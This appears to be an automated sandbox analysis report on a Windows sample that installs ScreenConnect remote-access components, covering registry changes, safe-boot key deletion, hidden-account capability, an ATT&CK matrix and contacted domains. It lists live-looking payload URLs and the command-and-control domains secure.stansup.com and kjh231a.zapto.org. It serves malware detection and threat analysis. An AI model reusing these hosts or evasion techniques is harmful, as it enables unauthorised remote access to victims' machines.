                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BB1806
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 12_2_00884C71 RtlGetVersion,12_2_00884C71
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Deletes keys which are related to windows safe boot (disables safe mode boot)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 10.0.ScreenConnect.WindowsClient.exe.a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 7652, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 5292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		121
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  Inhibit System Recovery
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter                  		1
                  DLL Search Order Hijacking                  		1
                  DLL Search Order Hijacking                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		2
                  Windows Service                  		2
                  Windows Service                  		1
                  Install Root Certificate                  		Security Account Manager35
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Software Packing                  		NTDS51
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit                  		1
                  Scheduled Task/Job                  		1
                  Timestomp                  		LSA Secrets2
                  Process Discovery                  		SSHKeylogging3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials51
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Search Order Hijacking                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Masquerading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron51
                  Virtualization/Sandbox Evasion                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Hidden Users                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                  Bootkit                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542316 Sample: 96r3GgxntQ.exe Startdate: 25/10/2024 Architecture: WINDOWS Score: 66 48 secure.stansup.com 2->48 50 kjh231a.zapto.org 2->50 52 3 other IPs or domains 2->52 62 Multi AV Scanner detection for submitted file 2->62 64 .NET source code references suspicious native API functions 2->64 66 Detected potential unwanted application 2->66 68 2 other signatures 2->68 9 96r3GgxntQ.exe 2 2->9         started        11 ScreenConnect.ClientService.exe 2->11         started        14 svchost.exe 8 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 19 dfsvc.exe 127 110 9->19         started        23 WerFault.exe 19 16 9->23         started        72 Reads the Security eventlog 11->72 74 Reads the System eventlog 11->74 76 Deletes keys which are related to windows safe boot (disables safe mode boot) 11->76 25 ScreenConnect.WindowsClient.exe 11->25         started        28 WerFault.exe 2 14->28         started        46 127.0.0.1 unknown unknown 16->46 signatures6 process7 dnsIp8 54 kjh231a.zapto.org 79.110.49.185, 443, 49727, 49749 OTAVANET-ASCZ Germany 19->54 36 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 19->36 dropped 38 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 19->38 dropped 40 ScreenConnect.WindowsBackstageShell.exe, PE32 19->40 dropped 44 13 other files (none is malicious) 19->44 dropped 30 ScreenConnect.WindowsClient.exe 19 10 19->30         started        42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 23->42 dropped 70 Contains functionality to hide user accounts 25->70 file9 signatures10 process11 signatures12 78 Contains functionality to hide user accounts 30->78 33 ScreenConnect.ClientService.exe 30->33         started        process13 signatures14 56 Detected unpacking (creates a PE file in dynamic memory) 33->56 58 Contains functionality to hide user accounts 33->58 60 Enables network access during safeboot for specific services 33->60

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  96r3GgxntQ.exe24%ReversingLabsWin32.Trojan.Generic

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                  https://g.live.com/odclientsettings/Prod.C:0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.w3.or0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                  http://www.w3.o0%URL Reputationsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.214.172
                  		truefalse
                    		unknown
                    s-part-0017.t-0009.fb-t-msedge.net
                    		13.107.253.45
                    		truefalse
                      		unknown
                      secure.stansup.com
                      		79.110.49.185
                      		truefalse
                        		unknown
                        kjh231a.zapto.org
                        		79.110.49.185
                        		truefalse
                          		unknown
                          fp2e7a.wpc.phicdn.net
                          		192.229.221.95
                          		truefalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                              		unknown
                              https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                                		unknown
                                https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configfalse
                                  		unknown
                                  https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                                    		unknown
                                    https://secure.stansup.com/Bin/ScreenConnect.ClientService.exefalse
                                      		unknown
                                      https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exefalse
                                        		unknown
                                        https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllfalse
                                          		unknown
                                          https://secure.stansup.com/Bin/ScreenConnect.Client.dllfalse
                                            		unknown
                                            https://secure.stansup.com/Bin/ScreenConnect.Windows.dllfalse
                                              		unknown
                                              https://secure.stansup.com/Bin/ScreenConnect.Client.manifestfalse
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://secure.stansup.com/Bin/ScreenConnect.Client.application.MO3RTdfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.application9ScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://secure.stansup.com/Bin/ScreenConnect.Client.applicationGdfsvc.exe, 00000002.00000002.2252252771.00000276A2B61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://secure.staPJdfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.application9e0892ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000007.00000003.1383388328.0000025CF7860000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
